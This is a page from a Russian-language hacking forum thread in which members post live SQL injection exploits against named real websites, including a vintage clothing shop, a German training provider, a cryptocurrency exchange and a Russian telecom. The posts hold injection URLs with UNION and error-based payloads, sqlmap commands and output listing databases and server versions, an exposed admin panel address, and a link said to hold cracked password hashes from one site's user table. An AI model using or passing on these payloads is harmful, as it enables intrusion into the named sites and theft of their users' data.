HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #191  
Старый 29.07.2018, 13:51
RWD
Guest
Сообщений: n/a
Провел на форуме:
56255

Репутация: 2
По умолчанию

Код:
Code:
https://www.unique-vintage.com/apps/swymEmails/interfaces/interfaceStore.php?appname=Emails
Parameter: appname (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: appname=Emails' AND 8893=8893-- ZiPX
---
[12:48:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
available databases [5]:[*] information_schema[*] mysql[*] pbcomput_swym[*] performance_schema[*] sys
 
Ответить с цитированием

  #192  
Старый 21.08.2018, 10:42
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Код:
Code:
https://www.mato-gmbh.com/produkte/mview'and(extractvalue(null,concat(1,(select+user()))))='1/251/?PHPSESSID=99f3768df8485b713f55dc60de16c1aa
 
Ответить с цитированием

  #193  
Старый 07.09.2018, 14:03
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

DA49

Код:
Code:
https://www.bfz.de/seminarfinder?the_id=13&zieg_id=-8+union+select+1,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17+--+&foern_id=1&vanort=&umkreis=10&stichwort=&sort=entf&submitted=1
Microsoft SQL Server 2008 R2 (SP3)
 
Ответить с цитированием

  #194  
Старый 15.09.2018, 14:20
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

 
Ответить с цитированием

  #195  
Старый 22.09.2018, 20:03
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

 
Ответить с цитированием

  #196  
Старый 22.09.2018, 23:58
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Биржа крипты, слепая инъекция.

Код:
Code:
sqlmap -u "https://www.ccnex.com/index.php?before_group=3&c=member_controller&m=upgrade&now_group=5&s=help&username=if" -p "username" --dbms=mysql --level=3 --risk=3 --random-agent --dbs
 
Ответить с цитированием

  #197  
Старый 19.10.2018, 19:20
Pirnazar
Guest
Сообщений: n/a
Провел на форуме:
44620

Репутация: 5
По умолчанию

Код:
Code:
http://top.magreklama.ru/
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=260 AND 9312=9312

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=260 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: id=-3254 UNION ALL SELECT CONCAT(0x71766a6a71,0x686e626c4b547a41514a7841524666765564447557656e73737257757144446b4845694370475458,0x717a767871)-- Tzua
---
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
---
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
Расшифрованные хеши из таблицы rekl_kv_naozero.users виде hashass

http://zalil.su/6334652
 
Ответить с цитированием

  #198  
Старый 20.11.2018, 06:07
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

 
Ответить с цитированием

  #199  
Старый 20.11.2018, 12:59
sepo
Guest
Сообщений: n/a
Провел на форуме:
20604

Репутация: 18
По умолчанию

Код:
Code:
ТЕКОМ - является динамично развивающейся телекоммуникационной компанией, накопившей солидный опыт в области проектирования, поставках и монтаже оборудования связи, а также предоставляющей услуги связи и доступа в Интернет. Мы предлагаем нашим клиентам эффективное и оперативное решение возникающих задач, связанных с организацией телефонной связи и эксплуатацией телекоммуникационного оборудования.
Код:
Code:
http://www.tecom.ru/internet.php?id=-3+union+select+1,version(),database()--
Писал админам, но им оказалось похер на всё, так что решил выложить сюда...

P.S. Также там есть ещё Административный Интерфейс CommuniGate Pro

Код:
Code:
http://81.3.154.236:8010/Master/MainAdmin/
 
Ответить с цитированием

  #200  
Старый 21.11.2018, 22:37
sepo
Guest
Сообщений: n/a
Провел на форуме:
20604

Репутация: 18
По умолчанию

Код:
Code:
https://www.thecatching.com/news.php?id=-41+union+select+1,2,3,4,5,6,7,8,9--
Код:
Code:
https://www.thecatching.com/news.php?id=-41+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9--
Код:
Code:
https://www.thecatching.com/news.php?id=-41+union+select+1,2,3,table_name,5,6,7,8,9+from+information_schema.tables+limit%201,1--
поменял...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ